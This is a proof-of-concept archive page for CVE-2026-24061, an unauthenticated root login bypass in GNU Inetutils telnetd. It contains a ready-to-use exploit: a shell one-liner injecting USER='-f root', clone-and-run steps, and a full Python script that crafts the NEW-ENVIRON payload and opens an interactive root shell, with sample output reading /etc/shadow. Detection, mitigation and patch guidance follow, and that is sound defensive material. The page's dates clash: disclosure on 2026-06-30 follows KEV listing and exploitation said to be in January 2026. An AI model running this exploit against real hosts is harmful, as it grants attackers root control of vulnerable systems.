PoC Archive PoC Archive
Critical CVE-2026-24061 patched

GNU Inetutils telnetd Unauthenticated Root RCE via NEW-ENVIRON (CVE-2026-24061)

by Ashraf Zaryouh / 0xBlackash · 2026-06-30

CVSS 9.8/10
Severity
Critical
CVE
CVE-2026-24061
Category
network
Affected product
GNU Inetutils telnetd
Affected versions
1.9.3 through 2.7; Debian Linux 11.0 ships vulnerable version
Disclosed
2026-06-30
Patch status
patched

Metadata

FieldValue
Date Added2026-06-30
Last Updated2026-06-30
Author / ResearcherAshraf Zaryouh / 0xBlackash
CVE / AdvisoryCVE-2026-24061
Categorynetwork
SeverityCritical
CVSS Score9.8 (CVSSv3.1; AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
StatusWeaponized
TagsRCE, unauthenticated, authentication-bypass, telnetd, GNU-Inetutils, NEW-ENVIRON, legacy, OT, CISA-KEV, active-exploitation, Python
RelatedN/A

Affected Target

FieldValue
Software / SystemGNU Inetutils telnetd
Versions Affected1.9.3 through 2.7; Debian Linux 11.0 ships vulnerable version
Language / PlatformPython (PoC); C / Linux (target daemon)
Authentication RequiredNo (unauthenticated network attacker)
Network Access RequiredYes (TCP port 23)

Summary

CVE-2026-24061 is a critical authentication bypass in GNU Inetutils telnetd that grants an unauthenticated network attacker an immediate root shell. The NEW-ENVIRON Telnet option handler passes the USER environment variable unsanitised to /bin/login. Setting USER=-f root causes login to treat the session as pre-authenticated root, skipping all password verification. CISA added CVE-2026-24061 to the Known Exploited Vulnerabilities (KEV) catalog in January 2026, with a remediation deadline of 02/16/2026. Mass exploitation against legacy and OT systems was observed shortly after public disclosure. Fixed in GNU Inetutils 2.8 (two patch commits on Codeberg).


Vulnerability Details

Root Cause

When a Telnet client negotiates NEW-ENVIRON, telnetd receives environment variables including USER and forwards them to /bin/login via execve. The USER value is not sanitised before being passed as arguments. Because /bin/login accepts -f <user> to skip authentication for already-verified users, injecting -f root as the USER value results in:

execve("/bin/login", ["login", "-f", "root", ...], ...)

Login sees the -f flag, skips password verification, and grants a root shell.

CWE-88 (Improper Neutralization of Argument Delimiters in a Command).

Attack Steps

  1. Connect to telnetd on TCP/23.
  2. During the Telnet option negotiation phase, send NEW-ENVIRON with USER=-f root.
  3. telnetd forwards the value to /bin/login — authentication is skipped.
  4. Attacker receives a root shell prompt.

One-liner

1
USER="-f root" telnet -a <TARGET_IP>

Impact

  • Immediate unauthenticated root shell over the network.
  • Full system compromise: /etc/shadow readable, persistence trivial.
  • High risk in legacy environments, OT/ICS networks, and embedded systems where telnetd is still running.
  • Active exploitation in the wild confirmed January–February 2026.

Environment / Lab Setup

Target:   Debian 11 / any host running GNU Inetutils telnetd 1.9.3–2.7
Attacker: Python 3 with telnetlib or standard telnet client

Proof of Concept

Python PoC

1
2
3
4
git clone https://github.com/0xBlackash/CVE-2026-24061
cd CVE-2026-24061
pip install -r requirements.txt   # if any
python3 telnetd.py <TARGET_IP> 23

Manual One-liner

1
USER="-f root" telnet -a <TARGET_IP>

Expected Output

Trying 192.168.1.100...
Connected to 192.168.1.100.
Escape character is '^]'.

root@legacy-box:~# whoami
root
root@legacy-box:~# id
uid=0(root) gid=0(root) groups=0(root)
root@legacy-box:~# cat /etc/shadow
root:$6$...

Detection & Indicators of Compromise

1
2
3
4
5
6
ss -tnlp | grep :23
netstat -anp | grep telnetd

grep -i "telnetd\|telnet" /var/log/auth.log | grep -i "root"

auditd -a always,exit -F arch=b64 -S execve -F exe=/bin/login -k telnet_login

Immediate mitigation:

1
2
3
4
systemctl disable --now telnet.socket
systemctl disable --now telnetd

iptables -A INPUT -p tcp --dport 23 -j DROP

Remediation

ActionDetail
PatchUpgrade GNU Inetutils to 2.8+ (Codeberg commits ccba9f748aa8d50a and fd702c02497b2f39)
DisableDisable telnetd entirely; replace with SSH
FirewallBlock TCP/23 from untrusted networks at perimeter and host level
CISA KEVRequired remediation deadline was 02/16/2026 — treat any unpatched hosts as compromised

References

telnetd.py
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
import telnetlib
import sys
import time

if len(sys.argv) < 2:
    print(f"Usage: python3 {sys.argv[0]} <host> [port=23]")
    sys.exit(1)

host = sys.argv[1]
port = int(sys.argv[2]) if len(sys.argv) > 2 else 23

tn = telnetlib.Telnet(host, port)
print(f"[+] Connected to {host}:{port}")

# Basic Telnet negotiation to reach env var stage
tn.sock.sendall(b"\xff\xfb\x01\xff\xfd\x01\xff\xfb\x03\xff\xfd\x03")  # ECHO + SGA

# Craft NEW-ENVIRON with USER=-f root
# IAC SB NEW-ENVIRON IS VAR USER VALUE -f root IAC SE
payload = (
    b"\xff\xfa\x27"          # IAC SB NEW-ENVIRON
    b"\x01"                  # IS
    b"\x00USER"              # VAR = USER
    b"\x01-f root"           # VALUE = -f root
    b"\xff\xf0"              # IAC SE
)

tn.sock.sendall(payload)
print("[+] Sent malicious USER env var")

time.sleep(1.5)  # Give server time to fork/exec login -f root

print("[+] Interact (press Enter a few times if needed)...")
tn.interact()    # Hands you the shell